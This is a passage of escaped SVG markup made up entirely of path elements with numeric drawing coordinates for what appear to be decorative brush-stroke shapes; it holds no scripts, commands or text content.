d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path 